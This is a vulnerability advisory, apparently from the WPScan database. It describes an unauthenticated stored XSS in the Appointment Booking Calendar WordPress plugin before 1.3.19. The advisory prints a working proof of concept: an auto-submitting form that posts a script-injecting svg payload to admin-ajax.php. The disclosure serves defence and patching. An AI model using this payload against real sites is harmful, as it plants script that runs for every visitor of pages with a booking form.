WordPress Plugin Vulnerabilities
Appointment Booking Calendar < 1.3.19 - Unauthenticated Stored XSS
Description
Lack of authorisation check in the cpabc_appointments_save_edition() function can lead to stored XSS via the editionarea parameter when cfwpp_edit is set to 'js' or 'css'
Proof of Concept
<body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="js"/> <input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/> </form> </body> <body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="css"/> <input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/> </form> </body> The payload will be triggered in all pages with a booking form.
Affects Plugins
Fixed in 1.3.19 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-07-04 (about 4 years ago)
Added
2019-07-05 (about 4 years ago)
Last Updated
2020-08-10 (about 3 years ago)
WPScan 